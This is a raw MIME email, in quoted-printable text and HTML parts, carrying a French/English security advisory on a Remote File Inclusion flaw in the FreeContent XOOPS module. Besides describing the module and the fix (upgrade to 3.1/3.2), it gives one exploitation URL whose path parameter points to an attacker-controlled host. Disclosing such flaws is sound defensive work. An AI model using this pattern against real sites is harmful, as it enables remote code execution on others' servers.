------=_Part_19161_13964465.1145017194132
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Produit : FreeContent
La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres
versions peuvent =E9galement =EAtre affect=E9es.
Probl=E8me : Remote File Inclusion
Site officiel : http://www.wjue.org/ & http://www.guanxicrm.com/
Auteur : Silitix - Silitix@gmail.com
Description FR :
#############
Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur
xoops, maintenant d=E9tron=E9 par CJay-Content
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement
d=E9posez sur votre serveur.
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt
les liens URL qui se trouveraient dans
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =E7=E0 !
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles
apparaissent dans le bloc.
Description ENG :
#################
With WebDigest capability FreeContent becomes the first Knowledge oriented
content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but
also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and
information.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o
automatically generate
relevant contents for your website.
Exploitation :
###########
http://[target]/modules/freecontent/index.php?path=3D[attacker]
Solution
#########
Appliquer la mise =E0 jour disponible sur le sitte officiel, les
versions 3.1/3.2
ne sont pas affect=E9es.
###### ---- > Avis de s=E9curit=E9 original : www.Silitix.com/freecontent.t=
xt
------=_Part_19161_13964465.1145017194132
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Produit : FreeContent
La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres versions peuvent =E9galement =EAtre affect=E9es.
Probl=E8me : Remote File Inclusion
Site officiel : http://www.wjue.org/ &=
amp; http://www.guanxicrm.com/
Auteur : Silitix - Silitix@gmail.com
Description FR :
#############
Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur xoops, maintenant d=E9tron=E9 par CJay-Content
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement=
d=E9posez sur votre serveur.
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt les liens URL qui se trouveraient dans
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =
=E7=E0 !
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles appara=
issent dans le bloc.
Description ENG :
#################
With WebDigest capability FreeContent becomes the first Knowledge oriented =
content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but=
also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and informati=
on.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o automatically generate
relevant contents for your website.
Exploitation :
###########
http://[target]/modules/fr=
eecontent/index.php?path=3D[attacker]
Solution
#########
Appliquer la mise =E0 jour disponible sur le sitte officiel, les vers=
ions 3.1/3.2 ne sont pas affect=E9es.
###### ---- > Avis de s=E9curit=E9 original : www.Silitix.com/freecontent.txt
------=_Part_19161_13964465.1145017194132--